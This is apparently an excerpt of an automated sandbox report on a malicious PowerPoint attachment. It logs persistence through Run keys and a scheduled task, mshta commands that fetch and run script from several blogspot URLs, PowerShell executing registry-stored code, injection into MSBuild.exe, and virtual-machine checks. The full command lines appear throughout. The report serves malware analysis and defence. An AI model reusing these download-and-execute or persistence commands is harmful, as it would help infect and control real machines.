Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone14.html"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html"", 0 : window.close")
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 : window.close")
Creates multiple autostart registry keys
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Windows\System32\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 1949
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 7788
              Source: C:\Windows\System32\mshta.exe TID: 2732 | Thread sleep time: -480000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 852 | Thread sleep time: -240000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\taskeng.exe TID: 2400 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1916 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2112 | Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2376 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 1532 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048 | Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2284 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\taskkill.exe TID: 3068 | Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 | Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1144 | Thread sleep time: -420000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 | Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340 | Thread sleep count: 1949 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2340 | Thread sleep count: 7788 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2092 | Thread sleep count: 94 > 30
              Source: C:\Windows\System32\mshta.exe TID: 2440 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1988 | Thread sleep time: -480000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804 | Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1068 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 1900 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 3036 | Thread sleep time: -540000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2560 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 2744 | Thread sleep time: -300000s >= -30000s
              Source: C:\Windows\System32\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_01D8096A GetSystemInfo,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: mshta.exe, 00000011.00000002.2222610577.00000000005BA000.00000004.00000001.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\mshta.exeMemory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')

Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: unknown base: 400000 value starts with: 4D5A

Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
